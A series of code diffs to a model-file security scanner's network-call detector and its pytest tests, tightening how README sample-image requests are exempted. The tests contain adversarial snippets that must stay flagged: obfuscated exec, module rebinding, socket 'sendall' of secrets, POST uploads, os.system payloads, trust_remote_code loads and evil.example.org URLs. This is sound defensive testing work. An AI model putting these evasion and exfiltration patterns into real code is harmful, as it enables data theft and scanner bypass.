             min(len(data), opening.end() + _MAX_README_IMAGE_EXAMPLE_BYTES),
         )
@@ -1964,6 +1964,29 @@ def _index_official_readme_sample_image_fences(
         fences.append((opening.end(), closing.start(), is_safe))
         cursor = closing.end()
     return fences, unvalidated_requests
+
+
+def _is_readme_image_example_context(context: str) -> bool:
+    filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
+    return filename == "readme" or (
+        filename.startswith("readme.") and filename.rsplit(".", 1)[-1] in {"txt", "md", "markdown", "rst", "env"}
+    )
+
+
+def _matching_readme_image_fence_end(
+    data: bytes,
+    opening: re.Match[bytes],
+    start: int,
+    end: int,
+) -> re.Match[bytes] | None:
+    opening_width = len(opening.group("fence"))
+    cursor = start
+    while closing := _README_FENCE_END_PATTERN.search(data, cursor, end):
+        delimiter = data[closing.start() : closing.end()].strip(b" \t\r")
+        if len(delimiter) >= opening_width:
+            return closing
+        cursor = closing.end()
+    return None
 
 
 def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
@@ -2050,7 +2073,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     known_names = (
         imported_names
         | documented_builtin_names
-        | {"Image", "torch"}
+        | {"Image", "str", "torch"}
         | {node.id for node in nodes if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store)}
         | {node.arg for node in nodes if isinstance(node, ast.arg)}
         | {node.name for node in nodes if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))}
@@ -2070,10 +2093,13 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     allowed_targets: set[int] = set()
     assignments: dict[str, list[tuple[int, str | None]]] = {}
     for statement in tree.body:
-        if not isinstance(statement, ast.Assign):
+        if not isinstance(statement, (ast.Assign, ast.AnnAssign)):
             continue
-        for target in statement.targets:
+        targets = statement.targets if isinstance(statement, ast.Assign) else [statement.target]
+        for target in targets:
             if isinstance(target, ast.Name) and target.id in protected_names and target.id != "requests":
+                if isinstance(statement, ast.AnnAssign) and not isinstance(statement.value, ast.Constant):
+                    continue
                 allowed_targets.add(id(target))
                 value = statement.value.value if isinstance(statement.value, ast.Constant) else None
                 assignments.setdefault(target.id, []).append(
@@ -2143,6 +2169,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
             attribute_root = node.func.value
             while isinstance(attribute_root, (ast.Attribute, ast.Subscript, ast.Call)):
+                if isinstance(attribute_root, ast.Call) and attribute_root in requests_calls:
+                    return False
                 attribute_root = attribute_root.func if isinstance(attribute_root, ast.Call) else attribute_root.value
             if isinstance(attribute_root, ast.Name) and attribute_root.id in (
                 requests_response_names | documented_builtin_names

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1924,9 +1924,11 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     except (SyntaxError, UnicodeDecodeError, RecursionError, ValueError):
         return False
 
-    nodes = list(ast.walk(tree))
-    if len(nodes) > _MAX_README_IMAGE_EXAMPLE_AST_NODES:
-        return False
+    nodes: list[ast.AST] = []
+    for node in ast.walk(tree):
+        if len(nodes) >= _MAX_README_IMAGE_EXAMPLE_AST_NODES:
+            return False
+        nodes.append(node)
     parents = {id(child): parent for parent in nodes for child in ast.iter_child_nodes(parent)}
     imports = [
         statement
@@ -1961,6 +1963,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             requests_calls.append(node)
     if not requests_calls:
         return False
+    if any(imports[0].lineno >= call.lineno for call in requests_calls):
+        return False
 
     protected_names = {"requests"}
     protected_names.update(
@@ -1981,14 +1985,26 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
     for node in nodes:
         if isinstance(node, ast.Import):
             for alias in node.names:
-                if alias.asname == "requests" or (alias.name == "requests" and node not in imports):
+                if (
+                    alias.name.split(".", maxsplit=1)[0] in {"builtins", "importlib", "sys"}
+                    or alias.asname == "requests"
+                    or (alias.name == "requests" and node not in imports)
+                ):
                     return False
         if isinstance(node, ast.ImportFrom) and (
-            node.module == "requests"
+            (node.module or "").split(".", maxsplit=1)[0] in {"builtins", "importlib", "requests", "sys"}
             or any(alias.name == "*" or alias.name == "requests" or alias.asname == "requests" for alias in node.names)
         ):
             return False
-        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)) and node.name in protected_names:
+        if isinstance(node, ast.Match):
+            return False
+        if isinstance(node, ast.ClassDef):
+            return False
+        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)) and (
+            node.name in protected_names or node.decorator_list
+        ):
+            return False
+        if isinstance(node, (ast.Global, ast.Nonlocal)) and any(name in protected_names for name in node.names):
             return False
         if isinstance(node, (ast.Assign, ast.AnnAssign, ast.AugAssign)):
             targets = node.targets if isinstance(node, ast.Assign) else [node.target]
@@ -1997,7 +2013,7 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if (
             isinstance(node, ast.Name)
             and node.id in protected_names
-            and isinstance(node.ctx, ast.Store)
+            and isinstance(node.ctx, (ast.Store, ast.Del))
             and id(node) not in allowed_targets
         ):
             return False
@@ -2017,9 +2033,9 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if isinstance(node, ast.ExceptHandler) and node.name in protected_names:
             return False
         if (
-            isinstance(node, ast.Call)
-            and isinstance(node.func, ast.Name)
-            and node.func.id
+            isinstance(node, ast.Name)
+            and isinstance(node.ctx, ast.Load)
+            and node.id
             in {
                 "eval",
                 "exec",

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1876,12 +1876,23 @@ def _is_doc_only_network_reference(
     return (metadata_context and word_count >= 4) or word_count >= 6
 
 
-def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, context: str) -> bool:
+def _is_official_readme_sample_image_request(
+    data: bytes,
+    *,
+    match_index: int,
+    context: str,
+    fence_cache: list[tuple[int, int, bool]],
+) -> bool:
     filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
     if filename != "readme.md":
         return False
+    for fence_start, fence_end, is_safe in reversed(fence_cache):
+        if fence_start <= match_index < fence_end:
+            return is_safe
 
     example: bytes | None = None
+    example_start = 0
+    example_end = 0
     window_start = max(0, match_index - _MAX_README_IMAGE_EXAMPLE_BYTES)
     for opening in _PYTHON_README_FENCE_PATTERN.finditer(data, window_start, match_index + 1):
         if opening.end() > match_index:
@@ -1893,8 +1904,20 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
         )
         if closing is not None and opening.end() <= match_index < closing.start():
             example = data[opening.end() : closing.start()]
+            example_start = opening.end()
+            example_end = closing.start()
             break
     if example is None:
+        return False
+    is_safe = _is_valid_official_readme_sample_image_example(example)
+    if len(fence_cache) >= 64:
+        fence_cache.pop(0)
+    fence_cache.append((example_start, example_end, is_safe))
+    return is_safe
+
+
+def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
+    if b"import requests" not in example or b"requests.get" not in example:
         return False
     try:
         tree = ast.parse(example.decode("utf-8"))
@@ -1906,11 +1929,13 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
         return False
     parents = {id(child): parent for parent in nodes for child in ast.iter_child_nodes(parent)}
     imports = [
-        node for node in nodes if isinstance(node, ast.Import) for alias in node.names if alias.name == "requests"
+        statement
+        for statement in tree.body
+        if isinstance(statement, ast.Import)
+        for alias in statement.names
+        if alias.name == "requests" and alias.asname is None
     ]
-    if not imports or any(
-        alias.asname is not None for node in imports for alias in node.names if alias.name == "requests"
-    ):
+    if len(imports) != 1:
         return False
 
     requests_calls: list[ast.Call] = []
@@ -1954,11 +1979,37 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
                     (statement.lineno, value if isinstance(value, str) else None)
                 )
     for node in nodes:
+        if isinstance(node, ast.Import):
+            for alias in node.names:
+                if alias.asname == "requests" or (alias.name == "requests" and node not in imports):
+                    return False
+        if isinstance(node, ast.ImportFrom) and (
+            node.module == "requests"
+            or any(alias.name == "*" or alias.name == "requests" or alias.asname == "requests" for alias in node.names)
+        ):
+            return False
+        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)) and node.name in protected_names:
+            return False
+        if isinstance(node, (ast.Assign, ast.AnnAssign, ast.AugAssign)):
+            targets = node.targets if isinstance(node, ast.Assign) else [node.target]
+            if any(not isinstance(target, ast.Name) for target in targets):
+                return False
         if (
             isinstance(node, ast.Name)
             and node.id in protected_names
             and isinstance(node.ctx, ast.Store)
             and id(node) not in allowed_targets
+        ):
+            return False
+        if (
+            isinstance(node, ast.Name)
+            and node.id == "requests"
+            and isinstance(node.ctx, ast.Load)
+            and (
+                not isinstance(parent := parents.get(id(node)), ast.Attribute)
+                or parent.value is not node
+                or parent.attr != "get"
+            )
         ):
             return False
         if isinstance(node, ast.arg) and node.arg in protected_names:
@@ -1975,6 +2026,10 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
                 "globals",
                 "locals",
                 "setattr",
+                "getattr",
+                "delattr",
+                "vars",
+                "__import__",
             }
         ):
             return False
@@ -2009,7 +2064,7 @@ def _is_official_readme_sample_image_request(data: bytes, *, match_index: int, c
         segments = parsed.path.split("/")
         if (
             parsed.scheme != "https"
-            or parsed.hostname not in _PUBLIC_MODEL_REPOSITORY_HOSTS
+            or parsed.hostname != "huggingface.co"
             or parsed.username is not None
             or parsed.password is not None
             or port is not None
@@ -2378,6 +2433,7 @@ class NetworkCommDetector:
         self._evidence_redaction_classifications = 0
         self._evidence_redaction_limit_reached = False
         self._cloud_nested_url_findings: set[str] = set()
+        self._official_readme_image_fences: list[tuple[int, int, bool]] = []
 
         # Clone class-level patterns to avoid cross-instance leakage
         self.cc_patterns: list[bytes] = self.CC_PATTERNS.copy()
@@ -2409,6 +2465,7 @@ class NetworkCommDetector:
         self._evidence_redaction_classifications = 0
         self._evidence_redaction_limit_reached = False
         self._cloud_nested_url_findings = set()
+        self._official_readme_image_fences = []
         if self.max_findings is None:
             self._url_contexts = self._index_url_contexts(data)
             self._url_context_starts = [start for start, _end, _url in self._url_contexts]
@@ -3048,7 +3105,12 @@ class NetworkCommDetector:
                         requires_call=not pattern.startswith((b"import ", b"from ")),
                     ) or (
                         lib == b"requests"
-                        and _is_official_readme_sample_image_request(data, match_index=match_index, context=context)
+                        and _is_official_readme_sample_image_request(
+                            data,
+                            match_index=match_index,
+                            context=context,
+                            fence_cache=self._official_readme_image_fences,
+                        )
                     ):
                         continue
 
@@ -3090,7 +3152,12 @@ class NetworkCommDetector:
                     requires_call=True,
                 ) or (
                     func == b"requests.get"
-                    and _is_official_readme_sample_image_request(data, match_index=idx, context=context)
+                    and _is_official_readme_sample_image_request(
+                        data,
+                        match_index=idx,
+                        context=context,
+                        fence_cache=self._official_readme_image_fences,
+                    )
                 ):
                     continue
 

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1729,6 +1729,7 @@ _EXPLICIT_PROSE_PREFIX_PATTERN = re.compile(
 _MAX_PROSE_LINE_CONTEXT_BYTES = 512
 _MAX_README_IMAGE_EXAMPLE_BYTES = 64 * 1024
 _MAX_README_IMAGE_EXAMPLE_AST_NODES = 1024
+_MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS = 64
 _PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```(?:python|py)[ \t]*\r?\n")
 _README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}```[ \t]*\r?$")
 _DOCUMENTED_IMAGE_SUFFIXES = (".png", ".jpg", ".jpeg", ".webp", ".gif", ".bmp")
@@ -1884,7 +1885,7 @@ def _is_official_readme_sample_image_request(
     fence_cache: list[tuple[int, int, bool]],
 ) -> bool:
     filename = context.replace("\\", "/").rsplit("/", 1)[-1].lower()
-    if filename != "readme.md":
+    if filename not in {"readme.md", "readme"}:
         return False
     for fence_start, fence_end, is_safe in reversed(fence_cache):
         if fence_start <= match_index < fence_end:
@@ -1894,7 +1895,12 @@ def _is_official_readme_sample_image_request(
     example_start = 0
     example_end = 0
     window_start = max(0, match_index - _MAX_README_IMAGE_EXAMPLE_BYTES)
+    openings: list[re.Match[bytes]] = []
     for opening in _PYTHON_README_FENCE_PATTERN.finditer(data, window_start, match_index + 1):
+        if len(openings) >= _MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS:
+            return False
+        openings.append(opening)
+    for opening in openings:
         if opening.end() > match_index:
             break
         closing = _README_FENCE_END_PATTERN.search(
@@ -1977,6 +1983,46 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         for target in statement.targets
         if isinstance(target, ast.Name)
     }
+    documented_builtin_names = {"enumerate", "len", "print", "range", "round", "zip"}
+    imported_names = {"requests"}
+    for node in nodes:
+        if isinstance(node, ast.Import):
+            for alias in node.names:
+                if alias.asname is not None or alias.name not in {"requests", "torch"}:
+                    return False
+                imported_names.add(alias.name)
+        elif isinstance(node, ast.ImportFrom):
+            if node.level != 0 or node.module not in {"PIL", "transformers"}:
+                return False
+            for alias in node.names:
+                if (
+                    alias.asname is not None
+                    or alias.name == "*"
+                    or (node.module == "PIL" and alias.name != "Image")
+                    or (node.module == "transformers" and not alias.name[:1].isupper())
+                ):
+                    return False
+                imported_names.add(alias.name)
+    known_names = (
+        imported_names
+        | documented_builtin_names
+        | {"Image", "torch"}
+        | {node.id for node in nodes if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store)}
+        | {node.arg for node in nodes if isinstance(node, ast.arg)}
+        | {node.name for node in nodes if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef))}
+    )
+    requests_response_names = {
+        target.id
+        for statement in tree.body
+        if isinstance(statement, ast.Assign)
+        and isinstance(statement.value, ast.Call)
+        and isinstance(statement.value.func, ast.Attribute)
+        and isinstance(statement.value.func.value, ast.Name)
+        and statement.value.func.value.id == "requests"
+        and statement.value.func.attr == "get"
+        for target in statement.targets
+        if isinstance(target, ast.Name)
+    }
     allowed_targets: set[int] = set()
     assignments: dict[str, list[tuple[int, str | None]]] = {}
     for statement in tree.body:
@@ -2020,10 +2066,12 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
                 return False
         if (
             isinstance(node, ast.Name)
-            and node.id in protected_names
+            and node.id in protected_names | imported_names | documented_builtin_names
             and isinstance(node.ctx, (ast.Store, ast.Del))
             and id(node) not in allowed_targets
         ):
+            return False
+        if isinstance(node, ast.Name) and isinstance(node.ctx, ast.Load) and node.id not in known_names:
             return False
         if (
             isinstance(node, ast.Name)
@@ -2043,9 +2091,15 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
         if (
             isinstance(node, ast.Call)
             and isinstance(node.func, ast.Name)
-            and node.func.id not in callable_assignments | {"enumerate", "len", "print", "range", "round", "zip"}
+            and node.func.id not in callable_assignments | documented_builtin_names
         ):
             return False
+        if isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
+            attribute_root = node.func.value
+            while isinstance(attribute_root, (ast.Attribute, ast.Subscript, ast.Call)):
+                attribute_root = attribute_root.func if isinstance(attribute_root, ast.Call) else attribute_root.value
+            if isinstance(attribute_root, ast.Name) and attribute_root.id in requests_response_names:
+                return False
         if isinstance(node, ast.Attribute) and node.attr in {"eval", "exec", "__import__"}:
             return False
         if (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2,6 +2,7 @@
 
 import json
 import os
+import re
 from collections.abc import Iterator
 from pathlib import Path
 from urllib.parse import quote, urlparse
@@ -2772,9 +2773,11 @@ class TestNetworkCommDetector:
             "https://HuggingFace.CO/spaces/ds4sd/demo/resolve/main/examples/sample.png",
         ],
     )
+    @pytest.mark.parametrize("context", ["README.md", "README"])
     def test_readme_python_example_official_sample_image_has_no_network_false_positive(
         self,
         image_url: str,
+        context: str,
     ) -> None:
         data = (
             "# Model card\n\n```python\nimport requests\n"
@@ -2782,7 +2785,7 @@ class TestNetworkCommDetector:
             "image = Image.open(requests.get(image_url, stream=True).raw)\n```\n"
         ).encode()
 
-        findings = NetworkCommDetector().scan(data, "README.md")
+        findings = NetworkCommDetector().scan(data, context)
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
         assert any(finding["type"] == "cloud_storage_url" for finding in findings)
@@ -2852,8 +2855,10 @@ class TestNetworkCommDetector:
             "match payload:\n    case {'x': _, **image_url}:\n        requests.get(image_url, stream=True)",
             "@mutate\ndef placeholder():\n    pass\nrequests.get(image_url, stream=True)",
             "class Hook(metaclass=mutate):\n    pass\nrequests.get(image_url, stream=True)",
-            "import importlib\nfetch = importlib.import_module('requests').post\n"
-            "requests.get(image_url, stream=True)\nfetch(input())",
+            (
+                "import importlib\nfetch = importlib.import_module('requests').post\n"
+                + "requests.get(image_url, stream=True)\nfetch(input())"
+            ),
             "del requests\nrequests.get(image_url, stream=True)",
             "del image_url\nrequests.get(image_url, stream=True)",
             "requests.get(image_url, stream=True)\nmatch payload:\n    case image_url:\n        fetch(image_url)",
@@ -2864,6 +2869,11 @@ class TestNetworkCommDetector:
             "replace_requests_get()\nrequests.get(image_url, stream=True)",
             "from attacker import install_hook\ninstall_hook()\nrequests.get(image_url, stream=True)",
             "__builtins__['ex' + 'ec']('requests.get(input())')\nrequests.get(image_url, stream=True)",
+            "import attacker\nrequests.get(image_url, stream=True)",
+            "import attacker\nattacker.install()\nrequests.get(image_url, stream=True)",
+            "import attacker as print\nprint()\nrequests.get(image_url, stream=True)",
+            "requests.get(image_url, stream=True)\nplugin.activate()",
+            "response = requests.get(image_url, stream=True)\nresponse.exfiltrate()",
         ],
     )
     def test_readme_python_example_preserves_rebound_or_unproven_requests(
@@ -2959,6 +2969,32 @@ class TestNetworkCommDetector:
             b"import requests\nrequests.get('https://huggingface.co/org/model/resolve/main/sample.png', stream=True)\n"
         )
         assert len(visited_nodes) == network_comm._MAX_README_IMAGE_EXAMPLE_AST_NODES + 1
+
+    def test_readme_official_image_example_rejects_excessive_fence_openings(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        closing_searches: list[int] = []
+        original_pattern = network_comm._README_FENCE_END_PATTERN
+
+        class CountedClosingPattern:
+            def search(self, data: bytes, start: int, end: int) -> re.Match[bytes] | None:
+                closing_searches.append(start)
+                return original_pattern.search(data, start, end)
+
+        monkeypatch.setattr(network_comm, "_README_FENCE_END_PATTERN", CountedClosingPattern())
+        data = (
+            b"```python\n" * (network_comm._MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS + 1)
+            + b"import requests\nrequests.get(image_url, stream=True)\n"
+        )
+
+        assert not network_comm._is_official_readme_sample_image_request(
+            data,
+            match_index=data.index(b"requests.get"),
+            context="README.md",
+            fence_cache=[],
+        )
+        assert not closing_searches
 
     def test_readme_official_image_in_different_fence_does_not_suppress_network_call(self) -> None:
         data = (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2857,6 +2857,8 @@ class TestNetworkCommDetector:
             "del requests\nrequests.get(image_url, stream=True)",
             "del image_url\nrequests.get(image_url, stream=True)",
             "requests.get(image_url, stream=True)\nmatch payload:\n    case image_url:\n        fetch(image_url)",
+            "builtins.exec('requests.get(input())')\nrequests.get(image_url, stream=True)",
+            "namespace['exec']('requests.get(input())')\nrequests.get(image_url, stream=True)",
         ],
     )
     def test_readme_python_example_preserves_rebound_or_unproven_requests(

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2848,6 +2848,15 @@ class TestNetworkCommDetector:
             "class requests:\n    get = payload\nrequests.get(image_url, stream=True)",
             "import sys\nsys.modules['requests'] = payload\nrequests.get(image_url, stream=True)",
             "fetch = __import__('requests').post\nrequests.get(image_url, stream=True)\nfetch(input())",
+            "match [payload]:\n    case [*requests]:\n        requests.get(image_url, stream=True)",
+            "match payload:\n    case {'x': _, **image_url}:\n        requests.get(image_url, stream=True)",
+            "@mutate\ndef placeholder():\n    pass\nrequests.get(image_url, stream=True)",
+            "class Hook(metaclass=mutate):\n    pass\nrequests.get(image_url, stream=True)",
+            "import importlib\nfetch = importlib.import_module('requests').post\n"
+            "requests.get(image_url, stream=True)\nfetch(input())",
+            "del requests\nrequests.get(image_url, stream=True)",
+            "del image_url\nrequests.get(image_url, stream=True)",
+            "requests.get(image_url, stream=True)\nmatch payload:\n    case image_url:\n        fetch(image_url)",
         ],
     )
     def test_readme_python_example_preserves_rebound_or_unproven_requests(
@@ -2873,6 +2882,19 @@ class TestNetworkCommDetector:
         )
 
         findings = NetworkCommDetector().scan(data, "example.py")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_official_sample_image_requires_requests_import_before_call(self) -> None:
+        data = (
+            b"```python\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n"
+            b"import requests\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
 
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
@@ -2912,6 +2934,24 @@ class TestNetworkCommDetector:
 
         assert len(validated_examples) == 1
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_official_image_example_stops_at_bounded_ast_node_limit(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        visited_nodes: list[int] = []
+
+        def oversized_ast_walk(_tree: network_comm.ast.AST) -> Iterator[network_comm.ast.AST]:
+            for index in range(network_comm._MAX_README_IMAGE_EXAMPLE_AST_NODES + 50):
+                visited_nodes.append(index)
+                yield network_comm.ast.Pass()
+
+        monkeypatch.setattr(network_comm.ast, "walk", oversized_ast_walk)
+
+        assert not network_comm._is_valid_official_readme_sample_image_example(
+            b"import requests\nrequests.get('https://huggingface.co/org/model/resolve/main/sample.png', stream=True)\n"
+        )
+        assert len(visited_nodes) == network_comm._MAX_README_IMAGE_EXAMPLE_AST_NODES + 1
 
     def test_readme_official_image_in_different_fence_does_not_suppress_network_call(self) -> None:
         data = (

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2773,7 +2773,7 @@ class TestNetworkCommDetector:
             "https://HuggingFace.CO/spaces/ds4sd/demo/resolve/main/examples/sample.png",
         ],
     )
-    @pytest.mark.parametrize("context", ["README.md", "README"])
+    @pytest.mark.parametrize("context", ["README.md", "README", "README.en.md", "README.markdown", "README.rst"])
     def test_readme_python_example_official_sample_image_has_no_network_false_positive(
         self,
         image_url: str,
@@ -2789,6 +2789,42 @@ class TestNetworkCommDetector:
 
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
         assert any(finding["type"] == "cloud_storage_url" for finding in findings)
+
+    @pytest.mark.parametrize(("opening", "closing"), [("```", "````"), ("````", "````"), ("````", "`````")])
+    def test_readme_python_example_accepts_valid_longer_fence_closers(self, opening: str, closing: str) -> None:
+        data = (
+            f"{opening}python\nimport requests\n"
+            "image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            "requests.get(image_url, stream=True)\n"
+            f"{closing}\n"
+        ).encode()
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_python_example_rejects_shorter_fence_closers(self) -> None:
+        data = (
+            b"````python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert any(finding["type"] == "network_library" for finding in findings)
+        assert any(finding["type"] == "network_function" for finding in findings)
+
+    def test_readme_python_example_accepts_constant_annotated_url_binding(self) -> None:
+        data = (
+            b"```python\nimport requests\n"
+            b"image_url: str = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     @pytest.mark.parametrize(
         "image_url",
@@ -2874,6 +2910,10 @@ class TestNetworkCommDetector:
             "import attacker as print\nprint()\nrequests.get(image_url, stream=True)",
             "requests.get(image_url, stream=True)\nplugin.activate()",
             "response = requests.get(image_url, stream=True)\nresponse.exfiltrate()",
+            "requests.get(image_url, stream=True).raw.exfiltrate()",
+            "requests.get(image_url, stream=True).raw.connection.sock.sendall(b'secret')",
+            "requests.get(image_url, stream=True).raw.connection.request('POST', '/upload', body='secret')",
+            "requests.get(image_url, stream=True).raw[0].send(image_url)",
             "print.__self__.__dict__['ex' + 'ec']('requests.get = print')\nrequests.get(image_url, stream=True)",
             (
                 "assert print.__self__.__dict__['ex' + 'ec']('requests.get = print') is None\n"

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2793,6 +2793,7 @@ class TestNetworkCommDetector:
             "http://huggingface.co/org/model/resolve/main/sample.png",
             "https://evil.example.org/sample.png",
             "https://huggingface.co.evil.example.org/sample.png",
+            "https://hf.co/org/model/resolve/main/sample.png",
             "https://huggingface.co/org/model/resolve/main/payload.py",
             "https://huggingface.co/org/model/resolve/main/sample.png?next=https://evil.example.org/payload",
         ],
@@ -2838,6 +2839,15 @@ class TestNetworkCommDetector:
             "requests.get = payload\nrequests.get(image_url, stream=True)",
             "setattr(requests, 'get', payload)\nrequests.get(image_url, stream=True)",
             "fetch = requests.get\nrequests.get(image_url, stream=True)\nfetch(input())",
+            "from requests import post\nrequests.get(image_url, stream=True)\npost(input())",
+            "import attacker as requests\nrequests.get(image_url, stream=True)",
+            "from attacker import requests\nrequests.get(image_url, stream=True)",
+            "from attacker import *\nrequests.get(image_url, stream=True)",
+            "vars(requests)['get'] = payload\nrequests.get(image_url, stream=True)",
+            "object.__setattr__(requests, 'get', payload)\nrequests.get(image_url, stream=True)",
+            "class requests:\n    get = payload\nrequests.get(image_url, stream=True)",
+            "import sys\nsys.modules['requests'] = payload\nrequests.get(image_url, stream=True)",
+            "fetch = __import__('requests').post\nrequests.get(image_url, stream=True)\nfetch(input())",
         ],
     )
     def test_readme_python_example_preserves_rebound_or_unproven_requests(
@@ -2877,6 +2887,30 @@ class TestNetworkCommDetector:
 
         findings = NetworkCommDetector().scan(data, "README.md")
 
+        assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
+
+    def test_readme_official_image_example_is_validated_once_per_fence(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:
+        validated_examples: list[bytes] = []
+        original_validator = network_comm._is_valid_official_readme_sample_image_example
+
+        def count_validation(example: bytes) -> bool:
+            validated_examples.append(example)
+            return original_validator(example)
+
+        monkeypatch.setattr(network_comm, "_is_valid_official_readme_sample_image_example", count_validation)
+        data = (
+            b"```python\nimport requests\n"
+            b"image_url = 'https://huggingface.co/org/model/resolve/main/sample.png'\n"
+            + b"# requests.get is documented here\n" * 64
+            + b"requests.get(image_url, stream=True)\n```\n"
+        )
+
+        findings = NetworkCommDetector().scan(data, "README.md")
+
+        assert len(validated_examples) == 1
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
 
     def test_readme_official_image_in_different_fence_does_not_suppress_network_call(self) -> None:

--- a/tests/detectors/test_network_comm_detector.py
+++ b/tests/detectors/test_network_comm_detector.py
@@ -2790,7 +2790,10 @@ class TestNetworkCommDetector:
         assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}]
         assert any(finding["type"] == "cloud_storage_url" for finding in findings)
 
-    @pytest.mark.parametrize(("opening", "closing"), [("```", "````"), ("````", "````"), ("````", "`````")])
+    @pytest.mark.parametrize(
+        ("opening", "closing"),
+        [("```", "````"), ("````", "````"), ("````", "`````"), ("~~~", "~~~~"), ("~~~~", "~~~~")],
+    )
     def test_readme_python_example_accepts_valid_longer_fence_closers(self, opening: str, closing: str) -> None:
         data = (
             f"{opening}python\nimport requests\n"
@@ -2920,6 +2923,23 @@ class TestNetworkCommDetector:
                 + "requests.get(image_url, stream=True)"
             ),
             "torch.ops.load_library('payload.so')\nrequests.get(image_url, stream=True)",
+            "torch.load('payload.pt', weights_only=False)\nrequests.get(image_url, stream=True)",
+            "torch.distributed.init_process_group('gloo')\nrequests.get(image_url, stream=True)",
+            "Image.open('payload.tif')\nrequests.get(image_url, stream=True)",
+            (
+                "from transformers import AutoModel\n"
+                "AutoModel.from_pretrained('attacker/model', trust_remote_code=True)\n"
+                "requests.get(image_url, stream=True)"
+            ),
+            "os = 1\nos.system('payload')\nrequests.get(image_url, stream=True)",
+            (
+                "response = requests.get(image_url, stream=True)\nalias = response\n"
+                "alias.raw.connection.sock.sendall(b'x')"
+            ),
+            "raw = requests.get(image_url, stream=True).raw\nraw.connection.sock.sendall(b'x')",
+            "with requests.get(image_url, stream=True) as response:\n    response.raw.connection.sock.sendall(b'x')",
+            "(response := requests.get(image_url, stream=True)).raw.connection.sock.sendall(b'x')",
+            "responses = [requests.get(image_url, stream=True)]\nresponses[0].raw.connection.sock.sendall(b'x')",
             "(lambda: payload)()\nrequests.get(image_url, stream=True)",
         ],
     )
@@ -2937,6 +2957,41 @@ class TestNetworkCommDetector:
 
         assert any(finding["type"] == "network_library" for finding in findings)
         assert any(finding["type"] == "network_function" for finding in findings)
+
+    @pytest.mark.parametrize(
+        "additional_fence",
+        [
+            "```python\n# requests powers our image download\nprint('ok')\n```\n",
+            "```python\nprint('this example uses requests')\n```\n",
+        ],
+    )
